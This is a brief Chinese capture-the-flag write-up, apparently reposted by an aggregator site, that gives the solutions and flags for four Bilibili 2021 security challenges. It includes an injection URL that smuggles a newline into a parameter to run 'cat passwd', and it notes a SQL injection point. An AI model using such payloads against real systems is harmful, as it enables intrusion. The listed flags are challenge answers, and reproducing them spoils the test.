2021B站1024程序员节 网络攻防
Posted 超人安全院
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2021B站1024程序员节 网络攻防相关的知识,希望对你有一定的参考价值。
第一题:
加密方式:AES 加密
加密模式:ECB
填充方式:无影响,都可以
Key:hAPPy_1024_2233
96 位密文:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156
输出方式:Hex(十六进制)
解密结果(flag):a1cd5f84-27966146-3776f301-64031bb9
第二题:
F12-Sources-webpack-src-views-home.vue页面的注释里
36c7a7b4-cda04af0-8db0368d-b5166480
第三题:
下载源码审计
接换行符匹配正则表达式,换行执行命令
http://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd
9d3c3014-6c6267e7-086aaee5-1f18452a
第四题:
JSON user_name存在注入点
3d5dd579-0678ef93-18b70cae-cabc5d51
以上是关于2021B站1024程序员节 网络攻防的主要内容,如果未能解决你的问题,请参考以下文章
2017-2018-2 20179204《网络攻防实践》缓冲区溢出漏洞实验
2017-2018-2 20179204《网络攻防实践》第四周学习总结